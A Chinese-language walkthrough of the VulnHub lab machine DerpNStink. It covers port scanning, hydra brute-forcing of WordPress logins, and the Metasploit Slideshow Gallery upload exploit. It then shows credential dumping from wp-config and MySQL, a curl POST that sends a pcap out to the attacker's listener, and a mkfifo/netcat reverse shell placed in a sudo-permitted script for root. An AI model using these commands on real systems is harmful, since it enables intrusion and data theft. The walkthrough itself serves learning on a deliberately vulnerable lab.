vulnhub（11）：derpnstink（hydra爆破用户名和密码、验证的文件上传）

端口

nmap主机发现

nmap -sn 192.168.159.120/24

Nmap scan report for 192.168.159.120
Host is up (0.00020s latency).

120是新出现的机器，他就是靶机

nmap端口扫描

nmap -Pn 192.168.159.120 -p- --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh                                                                
80/tcp    open  http                                                                                                                  
 
发现开放3个端口

nmap -sT -sC -sV -O -p21,22,80 -oA nmap/scan 192.168.159.120详细端口扫描：
-sT：完整tcp连接
-sC：默认脚本扫描
-sV：服务版本探测
-O：系统信息探测

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 124ef86e7b6cc6d87cd82977d10beb72 (DSA)
|   2048 72c51c5f817bdd1afb2e5967fea6912f (RSA)
|   256 06770f4b960a3a2c3bf08c2b57b597bc (ECDSA)
|_  256 28e8ed7c607f196ce3247931caab5d2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/


分析：
21 ftp端口开放
80 web端口开放
22 ssh端口开放

21端口匿名登录不上去
看80端口，主页面只有两张图片，我们看源代码页面：
敏感信息1：<script type="text/info" src="/webnotes/info.txt"></script>
敏感信息2：注释<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->

立足

/webnotes/info.txt：
<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->

/webnotes：
[stinky@DeRPnStiNK /var/www/html ]$ whois derpnstink.local
   Domain Name: derpnstink.local
   Registry Domain ID: 2125161577_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.fakehosting.com
   Registrar URL: http://www.fakehosting.com
   Updated Date: 2017-11-12T16:13:16Z
   Creation Date: 2017-11-12T16:13:16Z
   Registry Expiry Date: 2017-11-12T16:13:16Z
   Registrar: fakehosting, LLC
   Registrar IANA ID: 1337
   Registrar Abuse Contact Email: stinky@derpnstink.local
   Registrar Abuse Contact Phone:
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
   
综合以上信息：
我们需要给ip绑定一个host头derpnstink.local，以便于后续正常访问服务
vim /etc/hosts
192.168.159.120         derpnstink.local

目录扫描

gobuster dir -u http://derpnstink.local/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash

发现：
/weblog/              (Status: 200) [Size: 15172]

再扫一遍weblog目录，
gobuster dir -u http://derpnstink.local/weblog -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash 
：
/.html/               (Status: 403) [Size: 296]
/.php/                (Status: 403) [Size: 295]
/index.php/           (Status: 301) [Size: 0] [--> http://derpnstink.local/weblog/]
/wp-content/          (Status: 200) [Size: 0]
/wp-login.php/        (Status: 200) [Size: 2796]
/wp-includes/         (Status: 403) [Size: 302]
/wp-admin/            (Status: 302) [Size: 0] [--> http://derpnstink.local/weblog/wp-login.php?redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&reauth=1]
/xmlrpc.php/          (Status: 405) [Size: 42]
/.php/                (Status: 403) [Size: 295]
/.html/               (Status: 403) [Size: 296]
/wp-signup.php/       (Status: 302) [Size: 0] [--> http://derpnstink.local/weblog/wp-login.php?action=register]

显然是个博客，貌似还是wordpress，我的插件检测到了这就是wordpress，版本是4.6.29

wpscan扫描

wpscan扫描一下：
wpscan --url http://derpnstink.local/weblog/ --api-token BQt8Nu27fqP76gJ44k9M5Z5AOuwQcc40k4YBs6lAUMY --disable-tls-checks

扫出了一个任意文件上传漏洞，其他的都是csrf或xss的跨站攻击
Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
这个漏洞我试了半天，当尝试msf利用此漏洞时，才发现他是需要验证的文件上传漏洞（Authenticated Arbitrary File Upload），也就是我们需要一个用户才能利用此漏洞

hydra爆破用户和密码

我们使用hydra爆破wordpress有哪些用户：
hydra -p 123 -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt derpnstink.local http-post-form "/weblog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1:Invalid"

解释一下：http-post-form表单数据是我提前用burp抓下来的，其中log=^USER^&pwd=^PASS^，分别是用户名密码及其占位符
Invalid表示回显中有“Invalid”字符串的结果不是我们想要的

抓到一个用户admin

我们使用hydra爆破admin的密码：
hydra -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top10000.txt -l admin derpnstink.local http-post-form "/weblog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1:incorrect|empty" 

成功爆破：
[80][http-post-form] host: derpnstink.local   login: admin   password: admin

验证的文件上传漏洞利用（CVE-2014-5460）

https://nvd.nist.gov/vuln/detail/CVE-2014-5460

search slideshow
结果：
1  exploit/unix/webapp/wp_slideshowgallery_upload  2014-08-28       excellent  Yes    Wordpress SlideShow Gallery Authenticated File Upload

use 1

option这样设置：
Basic options:
  Name         Current Setting   Required  Description
  ----         ---------------   --------  -----------
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port]
                                           [...]
  RHOSTS       derpnstink.local  yes       The target host(s), see https://github.com/rapid7/metas
                                           ploit-framework/wiki/Using-Metasploit
  RPORT        80                yes       The target port (TCP)
  SSL          false             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /weblog           yes       The base path to the wordpress application
  VHOST                          no        HTTP server virtual host
  WP_PASSWORD  admin             yes       Valid password for the provided username
  WP_USER      admin             yes       A valid username
  
  run 一下直接getshell ： www-data

提权

信息枚举

还是之前配置错误信息收集，没什么敏感的，接下来尝试敏感文件收集

find /var/www -name *conf* 2>/dev/null 
/var/www/html/weblog/wp-config.php
/var/www/html/weblog/wp-includes/images/smilies/icon_confused.gif
/var/www/html/weblog/wp-content/plugins/akismet/views/config.php
/var/www/html/weblog/wp-config-sample.php
/var/www/html/weblog/wp-admin/setup-config.php

cat /var/www/html/weblog/wp-config.php 获取到数据库登录用户密码

define('DB_NAME', 'wordpress');                                                             
define('DB_USER', 'root');                                                                      
define('DB_PASSWORD', 'mysql');

mysql登录后一顿查，最后翻出来了：
+------------------+-------------------------------------------+                       
| User             | Password                                  |                       
+------------------+-------------------------------------------+                       
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                       
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                      
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                        
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                      
| debian-sys-maint | *B95758C76129F85E0D68CF79F38B66F156804E93 |                       
| unclestinky      | *9B776AFB479B31E8047026F1185E952DD1E530CB |                      
| phpmyadmin       | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 |          
+------------------+-------------------------------------------+ 

unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

cat /etc/passwd：看到unclestinky对应的用户是stinky
破解$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57 
su切换一下用户，成功了

cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

我擦，flag2没找到直接到flag3了，算了等root后再说（虽然root后就懒得找了）

简单配置错误信息枚举后，没有可利用配置错误提权，直接收集下敏感信息
/home/stinky/Documents下有：
-rw-r--r--  1 root   root   4391468 Nov 13  2017 derpissues.pcap
pcap是抓的数据包
是root创建的，非常可疑，直接考下来wireshark分析

推荐一个很吊的脚本getfile.py，用于获取靶机上的文件
import http.server
import os

class SimpleHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        
        # 保存上传的文件
        with open("uploaded_file", 'wb') as f:
            f.write(post_data)

        # 返回成功响应
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'File uploaded successfully.')

if __name__ == "__main__":
    PORT = 8000
    server_address = ("", PORT)
    httpd = http.server.HTTPServer(server_address, SimpleHTTPRequestHandler)
    print(f"Serving on port {PORT}")
    httpd.serve_forever()

攻击机器：python getfile.py后

直接再靶机上：curl -X POST --data-binary @./derpissues.pcap http://192.168.159.47:8000/

是不是非常方便，用不着scp那么麻烦，而且需要用户身份验证

简单分析获取mrderp用户密码

登录后，sudo -l看一下
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*

直接：echo "mkfifo /tmp/f;nc 192.168.159.47 1234 0</tmp/f|/bin/sh > /tmp/f 2>&1;rm /tmp/f" > /home/mrderp/binaries/derpy.sh

然后：
攻击机器：nc -nvlp 1234
靶机：sudo /home/mrderp/binaries/derpy.sh

获取到root权限

flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

补：flag2

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

使用unclestinky用户登录wordpress后台管理页面，在Dashboard中看到

之前查数据库时候
+------------------+-------------------------------------------+                       
| User             | Password                                  |                       
+------------------+-------------------------------------------+                       
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                       
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                      
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                        
| root             | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |                      
| debian-sys-maint | *B95758C76129F85E0D68CF79F38B66F156804E93 |                       
| unclestinky      | *9B776AFB479B31E8047026F1185E952DD1E530CB | <===========用来登录  wordpress                   
| phpmyadmin       | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 |          
+------------------+-------------------------------------------+ 

unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41                 <======= 用来登录ssh
admin $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/